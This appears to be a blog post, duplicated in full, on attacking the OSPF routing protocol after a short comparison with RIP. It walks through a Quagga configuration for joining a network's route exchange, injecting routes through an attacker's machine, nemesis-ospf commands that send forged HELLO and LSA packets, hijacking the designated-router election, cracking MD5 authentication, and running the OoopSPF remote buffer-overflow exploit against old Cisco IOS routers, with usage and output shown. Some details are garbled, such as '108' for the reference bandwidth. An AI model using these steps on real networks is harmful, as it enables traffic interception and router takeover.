Oleg Petukhov, lawyer in the field of international law and personal data protection, information security specialist security, protection of information and personal data. Telegram channel: https://t.me/protectioninformation Telegram Group: https://t.me/informationprotection1 Website: https://legascom.ru Email: online@legascom.ru #informationprotection #informationsecurity The OSPF (Open Shortest Path First) routing protocol is best suited for large, dynamic, interconnected IP networks with multiple paths. As a rule, the OSPF routing protocol is used for routing in corporate networks containing an average of 50 local area networks and several thousand hosts. For a better understanding, let's compare RIP and OSPF. OSPF is a link-state protocol, unlike RIP, which is a distance-vector protocol. Each router updates its routing table based on the distance vectors it receives from its neighbors. When using the channel status protocol, the router does not exchange distance information with its neighbors. Instead, each router actively checks the status of its channels leading to each neighboring router and sends this information to its other neighbors, who can direct the data flow to the autonomous system. Each router receives information about the channel status and builds a complete routing table based on it. In the presented network, the route with two red routers will be considered optimal between Source and Destination. The reason for this is the faster channels on this route. From a practical point of view, the main difference is that the channel status protocol works much faster than the distance vector protocol. It should be noted that in the case of the channel status protocol, network convergence is much faster. The concept of protocol convergence usually refers to network stabilization after any changes, such as router failure or channel failure. OSPF also differs from RIP (like many other routing protocols) in that it uses IP directly. This means that it does not use UDP or TCP. OSPF has its own identifier, which is set in the protocol field in the IP header. Accordingly, attacks on OSPF are more complex than on RIP. The main difficulties are as follows: 1) the attacker's router needs to emulate the HELLO packet in order to exchange routing information with other routers.; 2) dependence on the hierarchy of routers involved in the exchange of OSPF routing information. The routers involved in the exchange may have different levels in the hierarchical routing scheme. Taking these difficulties into account, we will proceed to consider the main attacks on OSPF. The purpose of this attack is to present the route that passes through the attacker's machine as having the highest throughput. One of the criteria for choosing the optimal route in OSPF is a metric calculated using the formula metric = reference bandwidth / link bandwidth, where reference bandwidth = 108, link bandwidth is the bandwidth of the channel. For example, for channels with 100 Mbps, the metric value is 1, for 10 Mbps – 10, and so on. Thus, the attacker needs to set the metric value for his route to 1 in order to make it a priority. ! ! Zebra configuration saved from vty ! 2005/08/16 01:22:41 ! hostname legitimate.ospfd password 8 p@ssw0rd enable password 8 Cb/yfFsI.abqs log file /var/log/quagga/ospfd.log service advanced-vty service password-encryption ! ! interface eth0 description DMZ_Network ip ospf authentication message-digest ip ospf message-digest-key 1 md5 secret_key ! interface eth1 ! interface 10 ! interface tun10 ! router ospf ospf router-id 192.168.20.111 redistribute kernel redistribute connected network 192.168.20.0/24 area 0.0.0.0 area 0.0.0.0 authentication message-digest ! line vty exec-timeout 30 0 ! When the connection to the OSPF route exchange has been successfully completed, it is necessary to check the current status of the route information using the show ip opsf command.: legitimate.ospfd# show ip ospf OSPF Routing Process, Router ID: 192.168.20.111 Supports only single TOS (TOS0) routes This implementation conforms to RFC2328 RFC1583Compatibility flag is disabled OpaqueCapability flag is disabled SPF schedule delay 1 secs, Hold time between two SPFs 1 secs Refresh timer 10 secs This router is an ASBR (injecting external routing information) Number of external LSA 4. Checksum Sum 0x00025f81 Number of opaque AS LSA 0. Checksum Sum 0x00000000 Number of areas attached to this router: 1 Area ID: 0.0.0.0 (Backbone) Number of interfaces in this area: Total: 1, Active: 1 Number of fully adjacent neighbors in this area: 2 Area has message digest authentication SPF algorithm executed 29 times Number of LSA 9 Number of router LSA 4. Checksum Sum 0x00025166 Number of network LSA 1. Checksum Sum 0xffff90fa Number of summary LSA 2. Checksum Sum 0x000166c2 Number of ASBR summary LSA 2. Checksum Sum 0x00014713 Number of NSSA LSA 0. Checksum Sum 0x00000000 Number of opaque link LSA 0. Checksum Sum 0x00000000 Number of opaque area LSA 0. Checksum Sum 0x00000000 Next, add the appropriate routes.: kali / # ip route add 64.100.0.0/14 dev eth0 kali / # ip route add 128.107.0.0/16 dev eth0 Make sure that these routes have been successfully added to the OSPF exchange: legitimate.ospfd# sh ip ospf route ============ OSPF external routing table =========== N E2 64.100.0.0/14 [10/20] tag: 0 via 192.168.66.111, eth0 N E2 128.107.0.0/16 [10/20] tag: 0 via 192.168.66.111, eth0 As you understand, 192.168.66.111 is the attacker's machine. To implement this attack, you can also use the Nemesis utility mentioned earlier, or rather, its modification, designed specifically for working with OSPF. Here is a list of options for this utility: kali / # ./nemesis-ospf OSPF Packet Injection -=The NEMESIS Project 1.1 I 1999, 2000 obecian <obecian@celerity.bartoli.org> OSPF usage: ./nemesis-ospf [-v] [optlist] OSPF Packet Types: -p <OSPF Protocol> -pH HELLO, -pD DBD, -pL LSR, -pU LSU, -pR LSA (router), -pN LSA (network), -pM LSA (summary), -pA LSA (AS) OSPF HELLO options: -N <Neighbor Router Address> -i >Dead Router Interval> -l <OSPF Interval> OSPF DBD options: -z <MAX DGRAM Length> -x <Exchange Type> OSPF LSU options: -B <num of LSAs to bcast> OSPF LSA related options: -L <router id> -G <LSA age> OSPF LSA_RTR options: -u <LSA_RTR num> -y <LSA_RTR router type> -k <LSA_RTR router data> OSPF LSA_AS_EXT options: -f <LSA_AS_EXT forward address> -g <LSA_AS_EXT tag> OSPF options: -m <OSPF Metric> -s <Sequence Number> -r <Advertising Router Address> -n >OSPF Netmask> -O <OSPF Options> -R <OSPF Router id> -A <OSPF Area id> -P <Payload File (Binary or ASCII)> (-v VERBOSE packet struct to stdout) IP Options -S <Source Address> -D <Destination Address> -I <IP ID> -T <IP TTL> -t <IP/OSPF tos> -F <IP frag> -o <IP Options> Data Link Options: -d <Ethernet Device> -H <Source MAC Address> -M <Destination MAC Address> You must specify the source, recipient, protocol, and corresponding options. For example, to send a fake OSPF Neighbor Hello packet to the router, you need to run the following command: Kali / # ./nemesis-ospf –v –pH –N 128.107.0.1 An alternative implementation of this attack may be the generation of fake OSPF LSA updates, which can also be carried out using nemesis. Kali / # ./nemesis-ospf –v –pR LSA 128.107.0.1 We become a Designated- or Backup Designated-OSPF router. In medium and large networks using the OSPF protocol, a certain hierarchy of routers is used. In large networks using dozens or even hundreds of routers, maintaining up-to-date information is very resource-intensive. A hierarchy is used to separate the tasks of building routing tables and reducing the load on devices. At the top level of such a hierarchy, as a rule, the most productive router is present. Such a router is called a Designated router. The purpose of this device is to efficiently transmit up–to-date routing information to all routers involved in the OSPF exchange. In the event of a failure of the Designated router, it must be replaced by a Backup designated router, that is, a backup top-level router. The designated router is selected by voting based on the priority of the router and its IP address. An attacker may try to become this designated router. If DR is assigned priority 255 and BDR is assigned priority 254, it is impossible to win the election. However, many administrators do not use maximum priority values, assigning DR and BDR 100 and 10 or 2 and 1, respectively. Sometimes DR and BDR are assigned the most appropriate IP addresses. Thus, in order for an attacker to make his router designed, it is enough to establish how the DR is selected, and, based on this, fake either the priority or the IP address. In Quagga, you can set the priority using the following command: ip ospf priority 255 If DR and BDR have maximum priority values, you can try to disable them using various network attacks described in this book, and then try to substitute your fake router. Hacking OSPF MD5. For protection, the OSPF protocol uses MD5 authentication. Accordingly, by analogy with MD5 hacking in the RIP protocol, this protection can also be hacked here. This will require Cain & Abel. The hacking process itself is similar to that described in the posts on RIP hacking, so we will not describe it here. An attack on OSPF using the OoopSPF Exploit. Cisco routers with IOS operating system versions 11.2, 11.3 and 12.0 may overflow the buffer when receiving a large number of OSPF HELLO packets. The concept implementing this vulnerability is presented on the official website.: arhontus / # perl IOStack.pl -d 192.168.66.202 -p ****** -e ****** -r stackdump *********************************************************************** IOSSTRING: IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.3(6), RELEASE SOFTWARE (fc3) IMAGE: flash:c2600-ik9o3s3-mz.123-6.bin MEMORY: 61440K/4096K ARRAY: 82A7E210 PID RECORD STACK RETURNA RETURNV NAME <skip> 90 830CFF04 831FCD80 831fcd84 80446D50 OSPF Hello 150 82D290A8 831FFCA0 831ffca4 80446D50 OSPF Router <skip> arhontus / # ./OoopSPF Phenoelit OoopSPF Cisco IOS OSPF remote exploit (11.2.-12.0) (C) 2002/2003 FX of Phenoelit <fx@phenoelit.de> Usage: ./OoopSPF -s <src net> -n <src mask> -d <target rtr ip> -f <file> -t <targ#> Options: -s <src net> Use this network as source (as in target config) -n <src mask> Use this netmask as source (as in target config) -d <target> This is the target router interface IP -f <file> Use this as the new config for the router -t # Use this target value set (see below) -a <area> Use this OSPF area -v Be verbose (-vv or -vvv recommended) -D Directed attack (unicast) for 11.x targets -T Test only – don't send --- barely used options --- -L # Number of neighbors to announce (overflow size) -F # Start of data (seen reverse to overflow) -S # NOP sleet In the next post, we will move on to the security issues of the OSPF routing protocol.
Компания ЛЕГАС: адвокат, юрист, жалобы в ЕСПЧ
Environments with the OSPF protocol.
Oleg Petukhov, lawyer in the field of international law and personal data protection, information security specialist security, protection of information and personal data.
Telegram channel: https://t.me/protectioninformation Telegram Group: https://t.me/informationprotection1 Website: https://legascom.ru Email: online@legascom.ru #informationprotection #informationsecurity
The OSPF (Open Shortest Path First) routing protocol is best suited for large, dynamic, interconnected IP networks with multiple paths. As a rule, the OSPF routing protocol is used for routing in corporate networks containing an average of 50 local area networks and several thousand hosts.
For a better understanding, let's compare RIP and OSPF.
OSPF is a link-state protocol, unlike RIP, which is a distance-vector protocol. Each router updates its routing table based on the distance vectors it receives from its neighbors.
When using the channel status protocol, the router does not exchange distance information with its neighbors. Instead, each router actively checks the status of its channels leading to each neighboring router and sends this information to its other neighbors, who can direct the data flow to the autonomous system. Each router receives information about the channel status and builds a complete routing table based on it.
In the presented network, the route with two red routers will be considered optimal between Source and Destination. The reason for this is the faster channels on this route.
From a practical point of view, the main difference is that the channel status protocol works much faster than the distance vector protocol. It should be noted that in the case of the channel status protocol, network convergence is much faster. The concept of protocol convergence usually refers to network stabilization after any changes, such as router failure or channel failure.
OSPF also differs from RIP (like many other routing protocols) in that it uses IP directly. This means that it does not use UDP or TCP. OSPF has its own identifier, which is set in the protocol field in the IP header.
Accordingly, attacks on OSPF are more complex than on RIP. The main difficulties are as follows:
1) the attacker's router needs to emulate the HELLO packet in order to exchange routing information with other routers.;
2) dependence on the hierarchy of routers involved in the exchange of OSPF routing information. The routers involved in the exchange may have different levels in the hierarchical routing scheme.
Taking these difficulties into account, we will proceed to consider the main attacks on OSPF.
The purpose of this attack is to present the route that passes through the attacker's machine as having the highest throughput. One of the criteria for choosing the optimal route in OSPF is a metric calculated using the formula
metric = reference bandwidth / link bandwidth,
where reference bandwidth = 108, link bandwidth is the bandwidth of the channel.
For example, for channels with 100 Mbps, the metric value is 1, for 10 Mbps – 10, and so on.
Thus, the attacker needs to set the metric value for his route to 1 in order to make it a priority.
!
! Zebra configuration saved from vty
! 2005/08/16 01:22:41
!
hostname legitimate.ospfd
password 8 p@ssw0rd
enable password 8 Cb/yfFsI.abqs
log file /var/log/quagga/ospfd.log
service advanced-vty
service password-encryption
!
!
interface eth0
description DMZ_Network
ip ospf authentication message-digest
ip ospf message-digest-key 1 md5 secret_key
!
interface eth1
!
interface 10
!
interface tun10
!
router ospf
ospf router-id 192.168.20.111
redistribute kernel
redistribute connected
network 192.168.20.0/24 area 0.0.0.0
area 0.0.0.0 authentication message-digest
!
line vty
exec-timeout 30 0
!
When the connection to the OSPF route exchange has been successfully completed, it is necessary to check the current status of the route information using the show ip opsf command.:
legitimate.ospfd# show ip ospf
OSPF Routing Process, Router ID: 192.168.20.111
Supports only single TOS (TOS0) routes
This implementation conforms to RFC2328
RFC1583Compatibility flag is disabled
OpaqueCapability flag is disabled
SPF schedule delay 1 secs, Hold time between two SPFs 1 secs
Refresh timer 10 secs
This router is an ASBR (injecting external routing information)
Number of external LSA 4. Checksum Sum 0x00025f81
Number of opaque AS LSA 0. Checksum Sum 0x00000000
Number of areas attached to this router: 1
Area ID: 0.0.0.0 (Backbone)
Number of interfaces in this area: Total: 1, Active: 1
Number of fully adjacent neighbors in this area: 2
Area has message digest authentication
SPF algorithm executed 29 times
Number of LSA 9
Number of router LSA 4. Checksum Sum 0x00025166
Number of network LSA 1. Checksum Sum 0xffff90fa
Number of summary LSA 2. Checksum Sum 0x000166c2
Number of ASBR summary LSA 2. Checksum Sum 0x00014713
Number of NSSA LSA 0. Checksum Sum 0x00000000
Number of opaque link LSA 0. Checksum Sum 0x00000000
Number of opaque area LSA 0. Checksum Sum 0x00000000
Next, add the appropriate routes.:
kali / # ip route add 64.100.0.0/14 dev eth0
kali / # ip route add 128.107.0.0/16 dev eth0
Make sure that these routes have been successfully added to the OSPF exchange:
legitimate.ospfd# sh ip ospf route
============ OSPF external routing table ===========
N E2 64.100.0.0/14 [10/20] tag: 0
via 192.168.66.111, eth0
N E2 128.107.0.0/16 [10/20] tag: 0
via 192.168.66.111, eth0
As you understand, 192.168.66.111 is the attacker's machine.
To implement this attack, you can also use the Nemesis utility mentioned earlier, or rather, its modification, designed specifically for working with OSPF. Here is a list of options for this utility:
kali / # ./nemesis-ospf
OSPF Packet Injection -=The NEMESIS Project 1.1
I 1999, 2000 obecian <obecian@celerity.bartoli.org>
OSPF usage:
./nemesis-ospf [-v] [optlist]
OSPF Packet Types:
-p <OSPF Protocol>
-pH HELLO, -pD DBD, -pL LSR, -pU LSU, -pR LSA (router),
-pN LSA (network), -pM LSA (summary), -pA LSA (AS)
OSPF HELLO options:
-N <Neighbor Router Address>
-i >Dead Router Interval>
-l <OSPF Interval>
OSPF DBD options:
-z <MAX DGRAM Length>
-x <Exchange Type>
OSPF LSU options:
-B <num of LSAs to bcast>
OSPF LSA related options:
-L <router id>
-G <LSA age>
OSPF LSA_RTR options:
-u <LSA_RTR num>
-y <LSA_RTR router type>
-k <LSA_RTR router data>
OSPF LSA_AS_EXT options:
-f <LSA_AS_EXT forward address>
-g <LSA_AS_EXT tag>
OSPF options:
-m <OSPF Metric>
-s <Sequence Number>
-r <Advertising Router Address>
-n >OSPF Netmask>
-O <OSPF Options>
-R <OSPF Router id>
-A <OSPF Area id>
-P <Payload File (Binary or ASCII)>
(-v VERBOSE packet struct to stdout)
IP Options
-S <Source Address>
-D <Destination Address>
-I <IP ID>
-T <IP TTL>
-t <IP/OSPF tos>
-F <IP frag>
-o <IP Options>
Data Link Options:
-d <Ethernet Device>
-H <Source MAC Address>
-M <Destination MAC Address>
You must specify the source, recipient, protocol, and corresponding options. For example, to send a fake OSPF Neighbor Hello packet to the router, you need to run the following command:
Kali / # ./nemesis-ospf –v –pH –N 128.107.0.1
An alternative implementation of this attack may be the generation of fake OSPF LSA updates, which can also be carried out using nemesis.
Kali / # ./nemesis-ospf –v –pR LSA 128.107.0.1
We become a Designated- or Backup Designated-OSPF router.
In medium and large networks using the OSPF protocol, a certain hierarchy of routers is used. In large networks using dozens or even hundreds of routers, maintaining up-to-date information is very resource-intensive. A hierarchy is used to separate the tasks of building routing tables and reducing the load on devices. At the top level of such a hierarchy, as a rule, the most productive router is present. Such a router is called a Designated router. The purpose of this device is to efficiently transmit up–to-date routing information to all routers involved in the OSPF exchange.
In the event of a failure of the Designated router, it must be replaced by a Backup designated router, that is, a backup top-level router.
The designated router is selected by voting based on the priority of the router and its IP address.
An attacker may try to become this designated router.
If DR is assigned priority 255 and BDR is assigned priority 254, it is impossible to win the election. However, many administrators do not use maximum priority values, assigning DR and BDR 100 and 10 or 2 and 1, respectively. Sometimes DR and BDR are assigned the most appropriate IP addresses.
Thus, in order for an attacker to make his router designed, it is enough to establish how the DR is selected, and, based on this, fake either the priority or the IP address.
In Quagga, you can set the priority using the following command:
ip ospf priority 255
If DR and BDR have maximum priority values, you can try to disable them using various network attacks described in this book, and then try to substitute your fake router.
Hacking OSPF MD5.
For protection, the OSPF protocol uses MD5 authentication. Accordingly, by analogy with MD5 hacking in the RIP protocol, this protection can also be hacked here.
This will require Cain & Abel. The hacking process itself is similar to that described in the posts on RIP hacking, so we will not describe it here.
An attack on OSPF using the OoopSPF Exploit. Cisco routers with IOS operating system versions 11.2, 11.3 and 12.0 may overflow the buffer when receiving a large number of OSPF HELLO packets. The concept implementing this vulnerability is presented on the official website.:
arhontus / # perl IOStack.pl -d 192.168.66.202 -p ****** -e ****** -r stackdump
***********************************************************************
IOSSTRING: IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.3(6),
RELEASE SOFTWARE (fc3)
IMAGE: flash:c2600-ik9o3s3-mz.123-6.bin
MEMORY: 61440K/4096K
ARRAY: 82A7E210
PID RECORD STACK RETURNA RETURNV NAME
<skip>
90 830CFF04 831FCD80 831fcd84 80446D50 OSPF Hello
150 82D290A8 831FFCA0 831ffca4 80446D50 OSPF Router
<skip>
arhontus / # ./OoopSPF
Phenoelit OoopSPF
Cisco IOS OSPF remote exploit (11.2.-12.0)
(C) 2002/2003 FX of Phenoelit <fx@phenoelit.de>
Usage:
./OoopSPF -s <src net> -n <src mask> -d <target rtr ip> -f <file> -t <targ#>
Options:
-s <src net> Use this network as source (as in target config)
-n <src mask> Use this netmask as source (as in target config)
-d <target> This is the target router interface IP
-f <file> Use this as the new config for the router
-t # Use this target value set (see below)
-a <area> Use this OSPF area
-v Be verbose (-vv or -vvv recommended)
-D Directed attack (unicast) for 11.x targets
-T Test only – don't send
--- barely used options ---
-L # Number of neighbors to announce (overflow size)
-F # Start of data (seen reverse to overflow)
-S # NOP sleet
In the next post, we will move on to the security issues of the OSPF routing protocol.